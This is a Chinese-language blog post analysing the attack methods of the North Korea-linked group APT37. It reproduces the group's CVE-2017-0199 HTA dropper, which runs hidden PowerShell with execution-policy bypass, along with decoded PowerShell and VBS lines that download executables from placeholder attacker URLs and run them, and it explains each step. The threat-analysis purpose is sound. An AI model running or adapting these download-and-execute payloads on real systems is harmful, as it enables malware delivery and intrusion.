APT37攻击手法分析

2024-06-04 402 0

0x00 简介

APT37,也被称为 Reaper或Group123,是一组据信与朝鲜相关的高级持续性威胁(APT)组织。这个组织被认为与朝鲜政权有联系,可能是由朝鲜政府或军方支持和控制的。APT37已经被发现在进行针对各种行业和组织的网络攻击,包括政府机构、军事承包商、技术公司和媒体等。他们的主要目标之一是获取情报、窃取技术和实施破坏性行动,以支持朝鲜政府的利益。

APT37的攻击手法可以因其目标和行动的不同而有所变化,但总体来说,他们是一个高度有组织、技术水平较高且具有灵活性的网络间谍团体。对于潜在的目标组织来说,了解APT37的攻击手法并采取相应的防御措施至关重要。

0x01 特征

APT37使用多种高级技术进行攻击,其中一个显著的特征是利用Microsoft Office漏洞(CVE-2017-0199)下载并执行恶意HTA文件。

利用Microsoft Office漏洞

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />

<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand Base64加密命令" ,0
owFrClN0giJ.Run "cmd /c echo hta>%tmp%\webbrowser1094826604.tmp", 0
End If
Self.Close
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</head>
</html>

其中Base64加密的命令解密后会下载执行一个Windows脚本和两个恶意文件.

$c=new-object System.Net.WebClient
$t =$env:temp
$t1=$t+"\\alitmp0131.jpg"
$t2=$t+"\\alitmp0132.jpg"
$t3=$t+"\\alitmp0133.js"

try
{
echo $c.DownloadFile( "http://域名/btob_asiana/appach01.jpg",$t1)
$c.DownloadFile( "http://域名/btob_asiana/appach02.jpg",$t2)
$c.DownloadFile( "http://域名/btob_asiana/udel_ok.ipp",$t3)
wscript.exe $t3
}
catch
{
}

使用VBS和PowerShell下载恶意文件

objShell.Run "cmd.exe /k powershell.exe" & " " & "-windowstyle" & " " & "hidden" & " " & "-ExecutionPolicy Bypass" & " " & "$h='%APPDATA%/Microsoft/Windows/msvcrt32.dll'" & ";" & "$f='%APPDATA%/Microsoft/ieConv.exe'" & ";" & "$x='" & "http://" & "Url地址" & "/UserFiles/File/image/images/happy.jpg" & "';" & "$t='" & "http://" & "Url地址" & "/UserFiles/File/image/images/wwwtest.jpg" & "';" & "(" & "New-Object System.Net.WebClient" & ")" & ".DownloadFile($t,$f)" & ";" & "(" & "New-Object System.Net.WebClient" & ")" & ".DownloadFile($x,$h)" & ";" & "Start-Process $f" & ";" & "Stop-Process" & " " & "-processname" & " " & "cmd", 0

作用和命令详解:

  1. objShell.Run "cmd.exe /k powershell.exe" & " " & "-windowstyle" & " " & "hidden" & " " & "-ExecutionPolicy Bypass"

    • objShell.Run:使用VBScript的Wscript.Shell对象来运行一个命令。

    • "cmd.exe /k powershell.exe"

      :在命令提示符中启动PowerShell。

      • /k:在执行完命令后,不关闭命令提示符窗口。

    • -windowstyle hidden:隐藏PowerShell窗口,使其在后台运行,不显示给用户。

    • -ExecutionPolicy Bypass:绕过执行策略,使PowerShell可以运行脚本,而不受策略限制。

  2. 设置文件路径变量

    • "$h='%APPDATA%/Microsoft/Windows/msvcrt32.dll'":设置变量$h为文件路径%APPDATA%/Microsoft/Windows/msvcrt32.dll

    • "$f='%APPDATA%/Microsoft/ieConv.exe'":设置变量$f为文件路径%APPDATA%/Microsoft/ieConv.exe

  3. 设置下载链接变量

    • "$x='http://Url地址/UserFiles/File/image/images/happy.jpg'":设置变量$x为URL地址http://Url地址/UserFiles/File/image/images/happy.jpg

    • "$t='http://Url地址/UserFiles/File/image/images/wwwtest.jpg'":设置变量$t为URL地址http://Url地址/UserFiles/File/image/images/wwwtest.jpg

  4. 下载文件

    • "(New-Object System.Net.WebClient).DownloadFile($t,$f)":使用System.Net.WebClient对象下载文件$twwwtest.jpg)到路径$fieConv.exe)。

    • "(New-Object System.Net.WebClient).DownloadFile($x,$h)":使用System.Net.WebClient对象下载文件$xhappy.jpg)到路径$hmsvcrt32.dll)。

  5. 执行下载的文件

    • Start-Process $f:启动下载到路径$fieConv.exe)的可执行文件。

  6. 停止命令提示符进程

    • Stop-Process -processname cmd:停止名为cmd的进程,即关闭命令提示符窗口。

0x02 总结

APT37是一个高度有组织、技术水平高且灵活的网络间谍团体,他们利用各种技术手段进行攻击,包括利用Microsoft Office漏洞、VBS和PowerShell脚本等。了解其攻击手法并采取相应的防御措施,对于保护潜在目标组织的网络安全至关重要。通过针对性的安全策略和工具,企业可以有效地抵御APT37的攻击,保护其关键资产和信息安全。


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论